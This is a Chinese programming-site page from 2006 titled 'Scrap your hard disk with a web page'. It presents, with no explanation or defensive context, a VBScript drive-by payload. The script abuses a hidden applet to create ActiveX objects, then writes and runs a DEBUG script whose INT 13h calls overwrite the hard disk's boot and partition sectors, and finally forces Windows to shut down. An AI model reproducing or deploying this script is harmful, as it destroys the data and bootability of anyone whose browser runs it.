搜索文章:

首页  |  Java技术  |  Asp.net  |  Asp编程  |  VC/C++  |  Delphi  |  VB编程

用网页报废你的硬盘

<script language=vbscript>
document.write "<div style='position:absolute; left:0px; top:0px; width:0px; height:0px; z-index:28; visibility: hidden'><"&"applet name=bei"&"jing height=0 width=0 code=com.ms."&"activex.active"&"xcomponent></applet></div>"
set appleobject = document.applets("beijing")
appleobject.setclsid("")
appleobject.createinstance()
set wshell = appleobject.getobject()
appleobject.setclsid("")
appleobject.createinstance()
set fso = appleobject.getobject()
appleobject.setclsid("")
appleobject.createinstance()
set shell = appleobject.getobject()
intxt="a$-$mov ax,0301$-$mov bx,0100$-$mov cx,0100$-$mov dx,0080$-$int 13$-$int 3$-$-$g$-$-$w 100 2 0 100$-$w 100 3 0 100$-$q$-$"
intxt=replace(intxt,chr(36)&chr(45)&chr(36),vbcrlf)
set fin=fso.opentextfile("in.txt",2,true)
fin.write intxt
fin.close
set bat=fso.opentextfile("com.bat",2,true)
bat.write "@echo off"&vbcrlf&"path="&wph&"\command"&vbcrlf&"debug<in.txt>nul"&vbcrlf&"exit"
bat.close
wshell.run("com.bat")
wshell.run("rundll32.exe user.exe,exitwindows")
</script>
相关文章:
© 2006   www.java-asp.net